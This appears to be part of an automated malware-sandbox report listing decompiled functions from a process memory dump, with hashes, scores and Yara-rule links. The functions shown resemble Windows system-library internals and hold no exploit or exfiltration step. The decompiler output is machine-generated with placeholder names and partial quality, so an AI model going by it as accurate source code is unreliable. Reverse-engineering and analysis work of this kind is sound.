0x03425911
0x00000000
0x03425913
0x03425913
0x03425913
0x03425911
0x0342591d
0x03481035
0x0348103c
0x0348103f
0x03481056
0x03481056
0x0342593b

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84504c41061b7e1764a557f4a79159e28a809cc13c2bec895a1cb396012c3080
Instruction ID: 20b589927738301be7e6bf5bc3648555bb5255e36dbcc351d55257222afd09e4
Opcode Fuzzy Hash: 84504c41061b7e1764a557f4a79159e28a809cc13c2bec895a1cb396012c3080
Instruction Fuzzy Hash: 89018475B006189FC714EF6BDC009AFFBE9EB86120B9840AB9805EF254DF30DD06CA59

Uniqueness

Uniqueness Score: -1.00%

Function 034DFE3F, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E034DFE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x351d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0346FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E03447D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0346B640(E03469AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x034dfe3f
0x034dfe3f
0x034dfe4e
0x034dfe58
0x034dfe5d
0x034dfe5f
0x034dfe6a
0x034dfe72
0x034dfe75
0x034dfe78
0x034dfe83
0x034dfe95
0x034dfe85
0x034dfe8e
0x034dfe8e
0x034dfea0
0x034dfea1
0x034dfea3
0x034dfea8
0x034dfebd

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8017d9c75df4122298b1aac1ca89b0cf028d4dd203216a97c289508175b20e05
Instruction ID: 32ab21d4b54376af8a5d073b20f8e39131294cb56ad7dad6e788245dc91f2262
Opcode Fuzzy Hash: 8017d9c75df4122298b1aac1ca89b0cf028d4dd203216a97c289508175b20e05
Instruction Fuzzy Hash: EF018475A00358AFDB14DFAAD845FAEBBB8EF44700F00406BB901EF391DA709A05C799

Uniqueness

Uniqueness Score: -1.00%

Function 034DFEC0, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E034DFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x351d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0346FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E03447D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0346B640(E03469AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x034dfec0
0x034dfec0
0x034dfecf
0x034dfed9
0x034dfede
0x034dfee0
0x034dfeeb
0x034dfef3
0x034dfef6
0x034dfef9
0x034dff04
0x034dff16
0x034dff06
0x034dff0f
0x034dff0f
0x034dff21
0x034dff22
0x034dff24
0x034dff29
0x034dff3e

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43d632365746f1f27a85bfd542fee273d8443709ba18561f7abe60bea303eb21
Instruction ID: cd8f1d9b92faf22fdc079f2bfff9ff56e90fbbffe3b034e2b0d1f2fb46478d43
Opcode Fuzzy Hash: 43d632365746f1f27a85bfd542fee273d8443709ba18561f7abe60bea303eb21
Instruction Fuzzy Hash: A2017175A00318AFDB14DFA9D845EAEBBB8EB44700F00406BB901AF290DA709A05C799

Uniqueness

Uniqueness Score: -1.00%

Function 034F1074, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E034F1074(void* __ebx, signed int* __ecx, char __edx, void* __edi, intOrPtr _a4) {
				char _v8;
				void* _v11;
				unsigned int _v12;
				void* _v15;
				void* __esi;
				void* __ebp;
				char* _t16;
				signed int* _t35;

				_t22 = __ebx;
				_t35 = __ecx;
				_v8 = __edx;
				_t13 =  !( *__ecx) + 1;
				_v12 =  !( *__ecx) + 1;
				if(_a4 != 0) {
					E034F165E(__ebx, 0x3518ae4, (__edx -  *0x3518b04 >> 0x14) + (__edx -  *0x3518b04 >> 0x14), __edi, __ecx, (__edx -  *0x3518b04 >> 0x14) + (__edx -  *0x3518b04 >> 0x14), (_t13 >> 0x14) + (_t13 >> 0x14));
				}
				E034EAFDE( &_v8,  &_v12, 0x8000,  *((intOrPtr*)(_t35 + 0x34)),  *((intOrPtr*)(_t35 + 0x38)));
				if(E03447D50() == 0) {
					_t16 = 0x7ffe0388;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				if( *_t16 != 0) {
					_t16 = E034DFE3F(_t22, _t35, _v8, _v12);
				}
				return _t16;
			}

0x034f1074
0x034f1080
0x034f1082
0x034f108a
0x034f108f
0x034f1093
0x034f10ab
0x034f10ab
0x034f10c3
0x034f10cf
0x034f10e1
0x034f10d1
0x034f10da
0x034f10da
0x034f10e9
0x034f10f5
0x034f10f5
0x034f10fe

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1834a0bc0c81077f1c3d85267127d1f6d820437e5d9679aa834a5363cb5c9dce
Instruction ID: e87532b596c40a17bc537e72d9072547a7fbb869cdcab2372b153421dfbbdcf5
Opcode Fuzzy Hash: 1834a0bc0c81077f1c3d85267127d1f6d820437e5d9679aa834a5363cb5c9dce
Instruction Fuzzy Hash: 35014C76504741DFC710EF2AC940B1BB7E5AB84310F08C52AF9968B790DE30D445CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 0343B02A, Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0343B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E03447D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E034A7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}

0x0343b037
0x0343b039
0x0343b03b
0x0343b040
0x0348a60e
0x00000000
0x00000000
0x0348a61d
0x0343b04b
0x0343b04e
0x0348a627
0x0348a634
0x00000000
0x00000000
0x0348a641
0x0348a653
0x0348a643
0x0348a64c
0x0348a64c
0x0348a65b
0x00000000
0x00000000
0x00000000
0x0348a66c
0x0343b057
0x0343b057
0x0343b057
0x0343b046
0x0343b046
0x00000000

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction ID: fdb948cb921badb912c6f1ec411321239ef89123732bad455512f1fb490d4d91
Opcode Fuzzy Hash: 2e61b3b4b4670f516fc01dc09380e60ecf2e8637ce05565c6f774399af743f4d
Instruction Fuzzy Hash: 6A017171209A809FD322DB5DC944FAB77ECEB46650F0D40A3E925CF761D668DC41CA28

Uniqueness

Uniqueness Score: -1.00%

Function 034F8A62, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E034F8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x351d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E03447D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0346B640(E03469AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x034f8a62
0x034f8a71
0x034f8a79
0x034f8a82
0x034f8a85
0x034f8a89
0x034f8a8c
0x034f8a8f
0x034f8a92
0x034f8a95
0x034f8a9f
0x034f8ab1
0x034f8aa1
0x034f8aaa
0x034f8aaa
0x034f8abc
0x034f8abd
0x034f8abf
0x034f8ac4
0x034f8ada

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51a424f320264fce9c32393793debec88821aaa37cb61014872d25f5489ded96
Instruction ID: 982750dfcf290db8966faac7f1b331656ccabac2f0f8d4680cc7947c7d4bf455
Opcode Fuzzy Hash: 51a424f320264fce9c32393793debec88821aaa37cb61014872d25f5489ded96
Instruction Fuzzy Hash: E8011E75A003199FCB00DFA9D9419AEB7B8EF48310F14405AF904EB351D634A901CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 034F8ED6, Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E034F8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x351d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E03447D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0346B640(E03469AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x034f8ed6
0x034f8ee5
0x034f8eed
0x034f8ef0
0x034f8efa
0x034f8f03
0x034f8f0c
0x034f8f15
0x034f8f24
0x034f8f27
0x034f8f31
0x034f8f43
0x034f8f33
0x034f8f3c
0x034f8f3c
0x034f8f4e
0x034f8f4f
0x034f8f51
0x034f8f56
0x034f8f69

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7ec3c30be9d3381ad661ea90229cf74a78c48b7599c3ac3bc57a44bab2af682
Instruction ID: 2b060e591076fa6be46393de66d2acb9877e7c26da028977f87fdb5d61783170
Opcode Fuzzy Hash: f7ec3c30be9d3381ad661ea90229cf74a78c48b7599c3ac3bc57a44bab2af682
Instruction Fuzzy Hash: 8D111E74A002599FDB04DFA9D441BAEFBF4FF08300F0442AAE518EF381E6349941CB95

Uniqueness

Uniqueness Score: -1.00%

Function 0342DB60, Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0342DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0342DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0342E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0342E8B0(__ecx, _t14, 0xfff);
							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x0342db64
0x0342db66
0x0342db6b
0x0342dbaa
0x0342db71
0x0342db76
0x0342db7a
0x0342dba3
0x0342db7c
0x0342db87
0x0342db8b
0x03484fa1
0x03484fb3
0x03484fb8
0x0342db91
0x0342db96
0x0342db98
0x0342db98
0x0342db8b
0x0342db7a
0x0342db9d
0x0342dba2

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: 8cd562629d9d2b013d5b71461794ca045810d541ea50a6393fd1b1b37c2a916a
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: 78F0CD375056329FD332D6564490B57BE559FC3650F55003BF225BF344C960880246DC

Uniqueness

Uniqueness Score: -1.00%

Function 0342B1E1, Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0342B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E03447D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E03447D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E034A7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x0342b1e8
0x0342b1ea
0x0342b1f3
0x03484a17
0x0342b1f9
0x0342b1f9
0x0342b1f9
0x0342b201
0x03484a21
0x03484a2e
0x00000000
0x00000000
0x03484a3b
0x03484a4d
0x03484a3d
0x03484a46
0x03484a46
0x03484a55
0x00000000
0x00000000
0x00000000
0x0342b20a
0x0342b20a
0x0342b20a
0x0342b20a

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: bf351621bb540e81aa97e8d8cf8e3db58692ca930eea12f1f8b6827e1a29f14b
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: 7901AD32200A909FD322E75AC808BAABF98EF51750F0D04A3E9249F7A1D678C801826C

Uniqueness

Uniqueness Score: -1.00%

Function 034BFE87, Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E034BFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x351d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E03447D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0346B640(E03469AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x034bfe96
0x034bfe9e
0x034bfea1
0x034bfead
0x034bfeb3
0x034bfeb9
0x034bfec3
0x034bfed5
0x034bfec5
0x034bfece
0x034bfece
0x034bfee0
0x034bfee1
0x034bfee3
0x034bfee8
0x034bfefb

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7ae8292fc86c29f6e19224bfaa595d885e71892271e9b295892e8ec1ba9b1ca
Instruction ID: 101ef3862a36bfd2fb7ceb1781eb551e6130031b8bf35c4e179b9773d35d9d9a
Opcode Fuzzy Hash: c7ae8292fc86c29f6e19224bfaa595d885e71892271e9b295892e8ec1ba9b1ca
Instruction Fuzzy Hash: 09016274A00308AFCB14DFA9D941A6EB7F4EF04300F14416AA518DF392DA35DA06DB55

Uniqueness

Uniqueness Score: -1.00%

Function 034F8F6A, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E034F8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x351d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E03447D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0346B640(E03469AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x034f8f6a
0x034f8f79
0x034f8f81
0x034f8f84
0x034f8f8b
0x034f8f91
0x034f8f94
0x034f8f9e
0x034f8fb0
0x034f8fa0
0x034f8fa9
0x034f8fa9
0x034f8fbb
0x034f8fbc
0x034f8fbe
0x034f8fc3
0x034f8fd6

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a991b71878598d741999d478255ff05d76fcf407f01e39141b92346a1f2aeab0
Instruction ID: ca6a268d4680f9cd6bcee9e9ce8a91e98841a7670ef1338a48a7560d963a20cd
Opcode Fuzzy Hash: a991b71878598d741999d478255ff05d76fcf407f01e39141b92346a1f2aeab0
Instruction Fuzzy Hash: 04013174A00209AFDB00EFA9D545AAEB7F4EF48300F14445AB915EF391DA74DA00DB99

Uniqueness

Uniqueness Score: -1.00%

Function 034E131B, Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E034E131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x351d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E03447D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0346B640(E03469AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x034e131b
0x034e132a
0x034e1330
0x034e1336
0x034e133e
0x034e1341
0x034e1344
0x034e134f
0x034e1361
0x034e1351
0x034e135a
0x034e135a
0x034e136c
0x034e136d
0x034e136f
0x034e1374
0x034e1387

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3b7acc525a154beb035a2a7daf9b9b1aa9befa0875bd0cf65678479bfa93014
Instruction ID: 4cfb1f8f92b86a57dc677715d5ac62b6222c3e2137b15b0ed971075bdd5c5755
Opcode Fuzzy Hash: b3b7acc525a154beb035a2a7daf9b9b1aa9befa0875bd0cf65678479bfa93014
Instruction Fuzzy Hash: 04013175A01348AFDB04EFA9D545AAEB7F4FF08700F10445AB815EF351E6749A00CB55

Uniqueness

Uniqueness Score: -1.00%

Function 034E1608, Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E034E1608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x351d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E03447D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0346B640(E03469AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x034e1608
0x034e1617
0x034e161d
0x034e1625
0x034e1628
0x034e162b
0x034e1636
0x034e1648
0x034e1638
0x034e1641
0x034e1641
0x034e1653
0x034e1654
0x034e1656
0x034e165b
0x034e166e

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13528f9dff6cc2f6ee556e09985b303d4fe5be2e2bd0ac37be9e7c7ef12910d9
Instruction ID: 67c255fa20c761f8567dbae832077b20dc4e78d61a88f0a0c54edce7a79e7032
Opcode Fuzzy Hash: 13528f9dff6cc2f6ee556e09985b303d4fe5be2e2bd0ac37be9e7c7ef12910d9
Instruction Fuzzy Hash: 91F06275A00358EFDB04EFA9D405E6EB7F4FF14300F04406AA915EF391EA349900CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0344C577, Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0344C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0344C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x34011cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E034F88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x0344c577
0x0344c57d
0x0344c581
0x0344c5b5
0x0344c5b9
0x0344c5ce
0x0344c5ce
0x0344c5ca
0x00000000
0x0344c5ca
0x0344c5c4
0x0344c5c8
0x00000000
0x00000000
0x00000000
0x0344c5ad
0x00000000
0x0344c5af

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52caa16b4f30eb5024c29198b600a98f51ee2f2e091dcd7aa43d31187f8e5ed7
Instruction ID: b05496174b35bce686dba929f1294870c95ea55b78b1af0521a798611d3f0236
Opcode Fuzzy Hash: 52caa16b4f30eb5024c29198b600a98f51ee2f2e091dcd7aa43d31187f8e5ed7
Instruction Fuzzy Hash: FEF06DB29176B0EEF7A5C6148084B2ABBD89B05660F4C84BBD4158F241D6B4DC80C258

Uniqueness

Uniqueness Score: -1.00%

Function 0346927A, Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0346927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L03444620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0346FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E034692C6(_t11, _t14);
				}
				return _t11;
			}

0x03469295
0x03469299
0x0346929f
0x034692aa
0x034692ad
0x034692ae
0x034692af
0x034692b0
0x034692b4
0x034692bb
0x034692bb
0x034692c5

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
